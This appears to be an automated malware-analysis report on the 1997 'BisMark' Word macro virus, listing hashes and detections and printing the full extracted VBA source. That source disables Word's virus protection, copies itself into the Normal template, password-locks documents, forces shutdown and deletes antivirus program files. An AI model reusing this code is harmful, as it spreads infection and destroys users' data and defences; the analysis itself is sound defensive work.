Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9b2fdc88371e524…

MALICIOUS

Office (OLE)

Size: 53.5 KB
Created: 1997-08-04 11:44:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1654f1feb26e551bf4a431fe22494e59
SHA-1: a09d52d2d67a522ed8198a51f2274580b395c366
SHA-256: f9b2fdc88371e5247640279a8bee56b35018f00a031e42de38985cbd8d5dd616
Risk Score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, including the auto-execution macros AutoOpen and Auto_Close, which are indicative of malicious intent. The macros attempt to copy themselves to the active document and the Normal template, suggesting an effort to achieve persistence. The ClamAV detection 'Doc.Trojan.Bismark-1' further supports the malicious verdict. The macro name 'BisMark' is included as an IOC.

Heuristics 5

  • ClamAV: Doc.Trojan.Bismark-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Bismark-1
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, 2 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3886 bytes
SHA-256: ecd2ad869d9c44c9cb264b3b18b4bf7e6bedd5a31435c8094a038f574722e24a
Detection: ClamAV: Doc.Trojan.Bismark-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "BisMark"
Sub AutoOpen()
On Error GoTo BisMark

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    documentinstalled = False
    Globalinstalled = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "BisMark" Then
            documentinstalled = True
        End If
   Next
  
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "BisMark" Then
            Globalinstalled = True
        End If
    Next

    If documentinstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
    End If

    If Globalinstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
    End If

    Application.DisplayAlerts = wdAlertsAll

BisMark:
BisMark
End Sub
Sub BisMark()
On Error GoTo BisMark
Application.StatusBar = True
StatusBar = "BisMark1 WMV97"
Application.Caption = "BisMark1 WMV97"
With ActiveDocument
.BuiltInDocumentProperties(wdPropertyTitle) = "BisMark1"
.BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
.BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyCompany) = "Virii Productions"
.BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus was Made By Talon"
End With
If WeekDay(Now()) = 4 And Hour(Now()) = 12 Then
AutoCorrect.Entries.Add Name:="the", Value:="Word Macro Virus BisMark1, Written By Talon"
Else
End If
BisMark:
End Sub

Sub ToolsMacro()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark 97"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub Toolscustomize()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark 97"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub ViewVBcode()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark 97"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub AutoClose()
On Error Resume Next
Kill "c:\program files\norton antivirus\*.*"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
Kill "C:\program files\antiviral toolkit pro\*.*"
End Sub